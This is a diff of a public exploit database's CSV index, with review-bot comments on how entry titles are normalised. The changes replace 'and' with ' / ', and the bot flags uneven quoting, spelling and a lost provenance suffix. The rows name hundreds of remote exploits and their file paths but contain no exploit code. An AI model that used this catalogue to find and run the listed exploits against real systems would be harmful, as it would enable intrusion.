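Review bot: the new 15352 title drops "(From the Wild)" in addition to the and-to-slash change. That suffix is not part of the separator normalisation applied elsewhere in this commit, and with author "Unknown" it was the only field in the row recording where the sample came from. Keep it, or move it to whatever tag convention the file uses for in-the-wild samples.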
@ -11212,7 +11214,7 @@ id,file,description,date,author,platform,type,port
|
|||
16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
|
||||
16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0
|
||||
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
|
||||
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
|
||||
16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
|
||||
16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
|
@ -11766,7 +11768,7 @@ id,file,description,date,author,platform,type,port
|
|||
18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
|
||||
18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0
|
||||
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
|
||||
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0
|
||||
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote,0
|
||||
18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0
|
||||
18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0
|
||||
18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0
|
||||
|
@ -11817,7 +11819,7 @@ id,file,description,date,author,platform,type,port
|
|||
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
|
||||
19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
|
||||
19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
|
||||
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0
|
||||
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
|
||||
19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
|
||||
19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0
|
||||
19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0
|
||||
|
@ -11832,7 +11834,7 @@ id,file,description,date,author,platform,type,port
|
|||
19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
|
||||
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
|
||||
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
|
||||
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
|
||||
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
|
||||
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
|
||||
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
|
||||
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
|
||||
|
@ -11866,7 +11868,7 @@ id,file,description,date,author,platform,type,port
|
|||
19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0
|
||||
19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0
|
||||
19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0
|
||||
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
|
||||
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
|
||||
19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0
|
||||
19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0
|
||||
19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
|
||||
|
@ -11885,7 +11887,7 @@ id,file,description,date,author,platform,type,port
|
|||
19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0
|
||||
19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
|
||||
19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
|
||||
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
|
||||
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote,0
|
||||
19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0
|
||||
19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0
|
||||
19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
|
||||
|
@ -11900,7 +11902,7 @@ id,file,description,date,author,platform,type,port
|
|||
19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0
|
||||
19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0
|
||||
19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0
|
||||
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
|
||||
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
|
||||
19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0
|
||||
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
|
||||
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0
|
||||
|
@ -11947,7 +11949,7 @@ id,file,description,date,author,platform,type,port
|
|||
19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0
|
||||
19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0
|
||||
19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0
|
||||
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
|
||||
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
|
||||
19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0
|
||||
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0
|
||||
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0
|
||||
|
@ -12097,7 +12099,7 @@ id,file,description,date,author,platform,type,port
|
|||
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote,0
|
||||
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote,0
|
||||
19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
|
||||
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0
|
||||
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0
|
||||
19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0
|
||||
19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0
|
||||
19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0
|
||||
|
@ -12354,7 +12356,7 @@ id,file,description,date,author,platform,type,port
|
|||
20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0
|
||||
20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0
|
||||
20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0
|
||||
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
|
||||
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
|
||||
20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
|
||||
20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
|
||||
20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0
|
||||
|
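Review bot: The new title for 20523 keeps "Command Execution and File Disclosure"; only the capital "And" is lowered. Other rows in this same change join two distinct issues with " / " (21110 becomes "Directory Existence / File Existence", 31052 becomes "HTML Injection / HTTP Response Splitting"). Suggest "Command Execution / File Disclosure" so the description column uses one separator for multi-issue entries.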
@ -12472,7 +12474,7 @@ id,file,description,date,author,platform,type,port
|
|||
20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0
|
||||
20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0
|
||||
20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0
|
||||
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
|
||||
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
|
||||
20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote,0
|
||||
20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0
|
||||
20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0
|
||||
|
@ -12606,7 +12608,7 @@ id,file,description,date,author,platform,type,port
|
|||
21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0
|
||||
21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0
|
||||
21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0
|
||||
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0
|
||||
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0
|
||||
21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0
|
||||
21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0
|
||||
21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
|
||||
|
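Review bot: Unchanged row 21112 in this hunk still reads "Remote 'Username' Enumeration", while the same change strips the quotes from Username in 19922 and 12266. Either drop the quotes here as well or keep them in all three rows. Elsewhere in the file the single quotes mark command and parameter names such as 'LIST' / 'MLSD' and 'sort' / 'orderBy', so the rule for when a word counts as a parameter should be stated once and applied throughout.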
@ -13266,7 +13268,7 @@ id,file,description,date,author,platform,type,port
|
|||
23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
|
||||
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0
|
||||
23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0
|
||||
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
|
||||
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
|
||||
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
|
||||
23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0
|
||||
23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0
|
||||
|
@ -13387,7 +13389,7 @@ id,file,description,date,author,platform,type,port
|
|||
23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0
|
||||
23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0
|
||||
23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0
|
||||
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
|
||||
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
|
||||
23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
|
||||
23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0
|
||||
23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0
|
||||
|
@ -13402,7 +13404,7 @@ id,file,description,date,author,platform,type,port
|
|||
23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0
|
||||
23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0
|
||||
23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
|
||||
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
|
||||
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
|
||||
23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0
|
||||
23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0
|
||||
23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote,0
|
||||
|
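Review bot: Context row 23679 in this hunk spells the element "IFrame" ("Shell: IFrame Cross-Zone Scripting (2)"), while the same change rewrites 19539 from "IFRAME Exploit" to "iFrame Exploit". Pick one spelling and apply it to 23679 too, otherwise a case-sensitive title search for either form misses one of the two Internet Explorer entries.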
@ -13588,7 +13590,7 @@ id,file,description,date,author,platform,type,port
|
|||
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0
|
||||
24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0
|
||||
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
|
||||
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0
|
||||
|
@ -13815,7 +13817,7 @@ id,file,description,date,author,platform,type,port
|
|||
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
|
||||
25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0
|
||||
25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0
|
||||
|
@ -14403,7 +14405,7 @@ id,file,description,date,author,platform,type,port
|
|||
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
|
||||
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
|
||||
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
|
||||
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
|
||||
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
|
||||
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
|
||||
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
|
||||
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
|
||||
|
@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port
|
|||
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0
|
||||
31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0
|
||||
31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0
|
||||
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
|
||||
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
|
||||
31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
|
@ -15016,7 +15018,7 @@ id,file,description,date,author,platform,type,port
|
|||
35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
|
||||
35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
|
||||
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
|
||||
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
|
||||
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
|
||||
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0
|
||||
35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
|
||||
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
|
||||
|
@ -15733,7 +15735,7 @@ id,file,description,date,author,platform,type,port
|
|||
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
|
||||
